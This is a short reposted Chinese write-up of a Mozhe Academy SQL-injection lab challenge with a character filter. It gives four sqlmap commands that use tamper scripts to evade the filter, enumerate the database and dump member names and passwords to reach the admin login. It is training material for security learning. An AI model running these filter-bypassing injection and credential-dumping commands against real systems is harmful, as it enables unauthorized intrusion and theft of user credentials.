SQL过滤字符后手工注入漏洞测试(第1题)

本文转载自查看原文 2019-04-23 11:19 546 SQLmap/ Penetration Testing

https://www.mozhe.cn/bug/detail/a1diUUZsa3ByMkgrZnpjcWZOYVEyUT09bW96aGUmozhe

分析题目，属于时间盲注，这种情况，通常使用sqlmap 直接注入就行了，手动语法太复杂了！！！

sqlmap -u "http://219.153.49.228:49703/new_list.php?id=1" --tamper charencode,equaltolike,space2comment --current-db

╰─ sqlmap -u "http://219.153.49.228:49703/new_list.php?id=1" --tamper charencode,equaltolike,space2comment -D mozhe_discuz_stormgroup --tables

╰─ sqlmap -u "http://219.153.49.228:49703/new_list.php?id=1" --tamper charencode,equaltolike,space2comment -D mozhe_discuz_stormgroup -T stormgroup_member --columns

╰─ sqlmap -u "http://219.153.49.228:49703/new_list.php?id=1" --tamper charencode,equaltolike,space2comment -D mozhe_discuz_stormgroup -T stormgroup_member -C name,password,status --dump

登录后台，获取flag，提交即可

免责声明！

本站转载的文章为个人学习借鉴使用，本站对版权不负任何法律责任。如果侵犯了您的隐私权益，请联系本站邮箱yoyou2525@163.com删除。

猜您在找 墨者学院 SQL手工注入漏洞测试(MySQL数据库-字符型） SQL注入——Union注入攻击——手工注入篇——SQL手工注入漏洞测试(MySQL数据库) SQL注入——布尔型盲注注入攻击——手工注入篇——SQL手工注入漏洞测试(MySQL数据库) SQL手工注入漏洞测试(Sql Server数据库) SQL手工注入绕过过滤 SQL手工注入 SQL注入语句-手工测试 SQL注入之手工注入 SQL注入之手工注入 SQL手工注入方法